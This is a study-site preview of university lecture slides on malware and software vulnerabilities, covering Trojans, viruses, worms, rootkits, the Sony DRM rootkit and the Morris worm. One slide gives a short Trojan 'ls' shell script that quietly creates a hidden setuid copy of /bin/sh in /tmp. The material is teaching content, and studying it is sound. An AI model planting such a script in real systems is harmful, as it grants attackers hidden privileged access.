DOC PREVIEW
U of I CS 498 - Malware and Exploit Enabling Code

This preview shows page 1-2-3-21-22-23-43-44-45 out of 45 pages.

Save
View full document
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience

Unformatted text preview:

Malware and ExploitEnabling CodeCS498IASpring 2007Reading Material• In Computer Security: Art and Science− Chapter 22• Sony DRM article− http://blogs.technet.com/markrussinovich/archive/2005/10/31/sony-rootkits-and-digital-rights-management-gone-too-far.aspx#comments• Worm Anatomy and Modelhttp://portal.acm.org/citation.cfm?id=948196• Smashing the Stack for Fun and Profithttp://phrack.org/phrack/49/P49-14Overview• Malware− Trojans− Viruses− Worms• Software vulnerabilities− Buffer overruns− OthersSoftware and Security“The Navy's Smart Ship technology is being considered asuccess, because it has resulted in reduced manpower,workloads, maintenance and costs for sailors aboard theAegis missile cruiser USS Yorktown. However, in September1997, the Yorktown suffered a systems failure duringmaneuvers off the coast of Cape Charles, VA., apparently asa result of the failure to prevent a divide by zero in aWindows NT application. The zero seems to have been anerroneous data item that was manually entered. Atlantic Fleetofficials said the ship was dead in the water for about 2hours and 45 minutes. A previous loss of propulsionoccurred on 2 May 1997, also due to software. Other systemcollapses are also indicated.” - RISKS 19.88Malicious Code• Code that intentionally violates security policy• Two questions:− How does the code get executed?− What does it do?Trojan Horse• Code is obtained from anuntrusted party• Code has two functions:− overt: what you expect it todo− covert: malicious actionTrojan Horse Example./ls:#!/bin/shcp /bin/sh /tmp/.xxshchmod u+s /tmp/.xxshrm ./lslsWordpressIt was determined that a cracker had gaineduser-level access to one of the servers thatpowers wordpress.org, and had used thataccess to modify the download file. Wehave locked down that server for furtherforensics, but at this time it appears that the2.1.1 download was the only thing touchedby the attack. They modified two files in WPto include code that would allow forremote PHP execution.Trojan Horse example• Thompson Turing award lecturecompile(source) {if (match(source, “check_password”)) {insert(source, A) }if (match(source, “compile”)) {insert(source, B);} ...}Trojan Horses & TCB• Thompson’s example shows importance ofknowing where all parts of the TCB camefrom− Includes hardware, O/S, login program, compiler?• Reputable sources help, but not a panaceaagainst Trojan horses− E.g. WordPress example, others− Commercial software not immuneViruses• Thompson’s Trojan propagated itself to otherinstances of the compiler• Generally, a propagating Trojan horse calleda virus− Malicious code that makes copies of itself• Virus goals:− Propagation− Stealth− PayloadVirus Propagation• Viruses move via:− Boot sectors− Executables− Macros− Attachments• Required qualities:− Can house malicious code− Traded frequentlyBoot Sector Viruses• First sector of disk executed at boot• Worked well back when people tradedfloppies− Could come back; “autorun.inf” on CDsBoot Data Virus Data BootExecutables• Attach itself to executable− Virus executes before normalexecutable is run• Can be multi-platform• Popular method, esp. whenBBS’s used to trade software− Also has infected commercialsoftware distributions• Still in use todayExecutableExecutableVirusMacros• Data files traditionally safe from viruses• Macro functionality blurs the line betweendata and code− E.g. spreadsheet macro can:• Modify spreadsheet• Modify other spreadsheets• Send email• ...• Melissa virusEmail attachments• Email software started allowing attachedfiles, including:− Executables (dancing bears)− Executables masquerading as data− E.g. “LOVE-LETTER-FOR-YOU.txt.vbs”• Spread by emailing itself to others− Use address book to look more trustworthy• Now moving onto mobile phones− MMS virusesVirus Protections• Virus scanners look for viruses− Signatures of known viruses− Modified executables− Strange memory-resident softwareVirus Stealth Techniques• Dormant period• Event-triggered payload• Encryption• Polymorphism• Root kits (later)Encryption• Encrypt virus content• Use small decryptionroutine with changing keyto decrypt prior toexecution• Anti-virus: find decryptionroutine?VirusVirusDecryptorPolymorphism• Equivalent code− Insert NO-OP instructions, useless operations• x = x+1 ; x = x-1− Reorder registers, instructions, control flow− ...• Detection problem: check whether code isequivalent to virus− How difficult is this?Rootkits• Insert file filters to cause files or directoriesdisappear from normal listings− Can replace Windows API pointers (user mode)− Can also replace syscall table pointers• Both require privilege, but with Windowsmost installs require privilege anyway− The power of extensibility used for the dark side• Techniques apply equally well to Linux andMacSony Player DRM and Rootkits• Bad press for Sony last year− Mark Russinovich's original observationshttp://blogs.technet.com/markrussinovich/archive/2005/10/31/sony-rootkits-and-digital-rights-management-gone-too-far.aspx#comments− A timelinehttp://www.boingboing.net/2005/11/14/sony_anticustomer_te.html• To ensure that copy protection is not evaded installrootkit to hide the protection code− Available for other attackers to use− Non-uninstallable− Uses CPU and memory− Not adequately noted in EULAViruses and Security Policies• How do security policies interact withviruses?− BLP?− Biba?− DAC?Worms• Worms: viruses that spread automaticallythrough a network− Usu. without human interaction− Usu. by exploiting a vulnerability• Terminology sometimes fuzzyThe Morris Worm Incident• How 99 lines of code brought down the Internet(ARPANET actually) in November 1988.• Robert Morris Jr. Ph.D student, Cornell, wrote aprogram that could:− Connect to another computer, and find and use one ofseveral vulnerabilities (buffer overflow in fingerd,password cracking etc.) to copy itself to that secondcomputer.− Begin to run the copy of itself at the new location.− Both the original code and the copy would then repeatthese actions in an infinite loop to other computers onthe ARPANET (mistake!)Worms vs. Computer Security• Worms change the computer security field− 60’s, 70’s: focus on secure design, securitypolicies, complete mediation, ...− 80’s: focus on cryptography, network


View Full Document

U of I CS 498 - Malware and Exploit Enabling Code

Documents in this Course
Lecture 5

Lecture 5

13 pages

LECTURE

LECTURE

39 pages

Assurance

Assurance

44 pages

LECTURE

LECTURE

36 pages

Pthreads

Pthreads

29 pages

Load more
Download Malware and Exploit Enabling Code
Our administrator received your request to download this document. We will send you the file to your email shortly.
Loading Unlocking...
Login

Join to view Malware and Exploit Enabling Code and access 3M+ class-specific study document.

or
We will never post anything without your permission.
Don't have an account?
Sign Up

Join to view Malware and Exploit Enabling Code 2 2 and access 3M+ class-specific study document.

or

By creating an account you agree to our Privacy Policy and Terms Of Use

Already a member?